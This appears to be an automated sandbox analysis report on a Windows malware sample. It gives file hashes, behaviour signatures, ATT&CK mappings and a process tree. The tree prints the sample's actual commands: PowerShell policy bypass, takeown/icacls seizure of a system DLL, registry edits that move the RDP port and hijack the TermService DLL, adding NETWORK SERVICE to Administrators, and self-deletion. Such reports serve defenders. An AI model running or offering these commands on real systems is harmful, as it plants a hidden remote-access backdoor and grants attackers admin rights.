b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e

General

Target

b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
Size

2.9MB
MD5

cc47bc788a58c510b00a5b288769a943
SHA1

184478b1e91d3354f5981c19e615bec766c38fab
SHA256

b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e
SHA512

ddf966d08c8de80ff86f222a4b794d9b0afeb3a1c88070452d086a3e61b8e8c0d65b40afbd2c28f1c0ca9d8f3947a1d9d485177290e0a745091908337dd0e1e6

Score

9^/10

discovery exploit persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1932 icacls.exe
872 icacls.exe
1940 icacls.exe
824 icacls.exe
1364 icacls.exe
1492 takeown.exe
1164 icacls.exe
1016 icacls.exe

pid	process
1932	icacls.exe
872	icacls.exe
1940	icacls.exe
824	icacls.exe
1364	icacls.exe
1492	takeown.exe
1164	icacls.exe
1016	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\tmp5211.dat"	reg.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Help\tmp5212.dat	upx

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

624 powershell.exe

pid	process
624	powershell.exe

Loads dropped DLL 5 IoCs

Processes:

b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe

pid	process
1660	b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
1660	b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
1660	b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
956
956

Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

824 icacls.exe
1364 icacls.exe
1492 takeown.exe
1164 icacls.exe
1016 icacls.exe
1932 icacls.exe
872 icacls.exe
1940 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
824	icacls.exe
1364	icacls.exe
1492	takeown.exe
1164	icacls.exe
1016	icacls.exe
1932	icacls.exe
872	icacls.exe
1940	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 3 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\help\tmp5213.dat	powershell.exe
File created	C:\Windows\help\tmp5211.dat	powershell.exe
File created	C:\Windows\help\tmp5212.dat	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

444 reg.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe

pid process

624 powershell.exe
624 powershell.exe
624 powershell.exe
624 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeicacls.exe

description pid process

Token: SeDebugPrivilege 624 powershell.exe
Token: SeRestorePrivilege 1016 icacls.exe

pid	process
444	reg.exe

pid	process
624	powershell.exe
624	powershell.exe
624	powershell.exe
624	powershell.exe

description	pid	process
Token: SeDebugPrivilege	624	powershell.exe
Token: SeRestorePrivilege	1016	icacls.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.execmd.exepowershell.exenet.exe

description	pid	process	target process
PID 1660 wrote to memory of 1224	1660	b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe	cmd.exe
PID 1660 wrote to memory of 1224	1660	b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe	cmd.exe
PID 1660 wrote to memory of 1224	1660	b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe	cmd.exe
PID 1660 wrote to memory of 1224	1660	b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe	cmd.exe
PID 1224 wrote to memory of 624	1224	cmd.exe	powershell.exe
PID 1224 wrote to memory of 624	1224	cmd.exe	powershell.exe
PID 1224 wrote to memory of 624	1224	cmd.exe	powershell.exe
PID 624 wrote to memory of 1492	624	powershell.exe	takeown.exe
PID 624 wrote to memory of 1492	624	powershell.exe	takeown.exe
PID 624 wrote to memory of 1492	624	powershell.exe	takeown.exe
PID 624 wrote to memory of 1164	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1164	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1164	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1016	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1016	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1016	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1932	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1932	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1932	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 872	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 872	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 872	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1940	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1940	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1940	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 824	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 824	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 824	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1364	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1364	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1364	624	powershell.exe	icacls.exe
PID 624 wrote to memory of 1780	624	powershell.exe	reg.exe
PID 624 wrote to memory of 1780	624	powershell.exe	reg.exe
PID 624 wrote to memory of 1780	624	powershell.exe	reg.exe
PID 624 wrote to memory of 444	624	powershell.exe	reg.exe
PID 624 wrote to memory of 444	624	powershell.exe	reg.exe
PID 624 wrote to memory of 444	624	powershell.exe	reg.exe
PID 624 wrote to memory of 1316	624	powershell.exe	net.exe
PID 624 wrote to memory of 1316	624	powershell.exe	net.exe
PID 624 wrote to memory of 1316	624	powershell.exe	net.exe
PID 1316 wrote to memory of 1184	1316	net.exe	net1.exe
PID 1316 wrote to memory of 1184	1316	net.exe	net1.exe
PID 1316 wrote to memory of 1184	1316	net.exe	net1.exe
PID 624 wrote to memory of 1600	624	powershell.exe	cmd.exe
PID 624 wrote to memory of 1600	624	powershell.exe	cmd.exe
PID 624 wrote to memory of 1600	624	powershell.exe	cmd.exe
PID 624 wrote to memory of 1612	624	powershell.exe	cmd.exe
PID 624 wrote to memory of 1612	624	powershell.exe	cmd.exe
PID 624 wrote to memory of 1612	624	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
"C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1
2⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1
3⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1492

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1164

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1932

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:872

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1940

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:824

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1364

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
4⤵
PID:1780

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\tmp5211.dat /f
4⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:444

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
5⤵
PID:1184

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
4⤵
PID:1600

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
4⤵
PID:1612

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

File Permissions Modification

1

T1222

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Remote Desktop Protocol

1

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1
Filesize
3.5MB

MD5
fdd9a0a19257b291d81aef4d310e9cd4

SHA1
79fca0c2c1044c0382ee37158d3c993010f79afe

SHA256
b842e422cea2540aa4d953b7940c18a6a5e23dabc933e979e9305b56cc3afd2e

SHA512
bad901dcf7130ee315547313595d259a7954edaf7726d2d65a6412f56ca02d836f1f8cd86ba562d34654e286d6efbc901369be6cbae03cdea027bfa07006a7e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\changes_7521tg.txt
Filesize
102B

MD5
7575fd92dd722a9f8eb4d7efce5e0a5f

SHA1
7773366c9157ac9be5247c45177ea2d7b7daf86b

SHA256
6d6623e881557bf3874f34aeff1d81e4b28aa19f408c43a162a9432ad75f6e9b

SHA512
7a50c77308c543886e7fa91149b39e3b0fd7de3b163d275dac03457c7ac4ce63adf4c8f0d22c59ceaae1e34a7eb6677461aad4081e7988502e85e142d0e6065c

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\Users\Admin\AppData\Local\Temp\nsoB241.tmp\System.dll
Filesize
11KB

MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
\Users\Admin\AppData\Local\Temp\nsoB241.tmp\blowfish.dll
Filesize
22KB

MD5
5afd4a9b7e69e7c6e312b2ce4040394a

SHA1
fbd07adb3f02f866dc3a327a86b0f319d4a94502

SHA256
053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

SHA512
f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

Download Submit
\Users\Admin\AppData\Local\Temp\nsoB241.tmp\blowfish.dll
Filesize
22KB

MD5
5afd4a9b7e69e7c6e312b2ce4040394a

SHA1
fbd07adb3f02f866dc3a327a86b0f319d4a94502

SHA256
053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

SHA512
f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

Download Submit
\Windows\Help\tmp5211.dat
Filesize
116KB

MD5
61de3d9dc03ed2a1d688e1425b52cfda

SHA1
68694949cbbba5f21515f6ef762356d20541f03c

SHA256
cd32a60b92378244fdd4ad85965effac0a9ed538d43b9b06ee7e91c6c2a9a2a9

SHA512
9138691813e976dacfc04336325d38236a66f8a3d1848c449a0ec29918cc4d21efd3ec33e39d87006302c10e821a132f2d1ef847dcfe1e2e6a4c132fd9762545

Download Submit
\Windows\Help\tmp5212.dat
Filesize
784KB

MD5
72f5170b8b6951ed93d6653bba6b17c1

SHA1
baadfbc7fe2b2e9c87faddb2d161fa162627828d

SHA256
d9a7b6d13f5a6f217a6f3e213b95a582d11a6fd93174ec4096892f0d7805e1b8

SHA512
ad874d06546bb3948024a5456e97adbfd42a2a11b2aeba914cc89752ed778e6fa276bdf2be2d728f95e3accac07067e80488979a97b82581c9adafeac7c4cd69

Download Submit
memory/444-77-0x0000000000000000-mapping.dmp

Download
memory/624-59-0x0000000000000000-mapping.dmp

Download
memory/624-64-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/624-62-0x000007FEF3B00000-0x000007FEF465D000-memory.dmp

Filesize
11.4MB

Download
memory/624-66-0x000000000253B000-0x000000000255A000-memory.dmp

Filesize
124KB

Download
memory/624-85-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/624-63-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/624-61-0x000007FEF4660000-0x000007FEF5083000-memory.dmp

Filesize
10.1MB

Download
memory/624-60-0x000007FEFC021000-0x000007FEFC023000-memory.dmp

Filesize
8KB

Download
memory/624-86-0x000000000253B000-0x000000000255A000-memory.dmp

Filesize
124KB

Download
memory/824-74-0x0000000000000000-mapping.dmp

Download
memory/872-72-0x0000000000000000-mapping.dmp

Download
memory/1016-70-0x0000000000000000-mapping.dmp

Download
memory/1164-69-0x0000000000000000-mapping.dmp

Download
memory/1184-79-0x0000000000000000-mapping.dmp

Download
memory/1224-58-0x0000000000000000-mapping.dmp

Download
memory/1316-78-0x0000000000000000-mapping.dmp

Download
memory/1364-75-0x0000000000000000-mapping.dmp

Download
memory/1492-67-0x0000000000000000-mapping.dmp

Download
memory/1600-83-0x0000000000000000-mapping.dmp

Download
memory/1612-84-0x0000000000000000-mapping.dmp

Download
memory/1660-54-0x0000000075761000-0x0000000075763000-memory.dmp

Filesize
8KB

Download
memory/1780-76-0x0000000000000000-mapping.dmp

Download
memory/1932-71-0x0000000000000000-mapping.dmp

Download
memory/1940-73-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads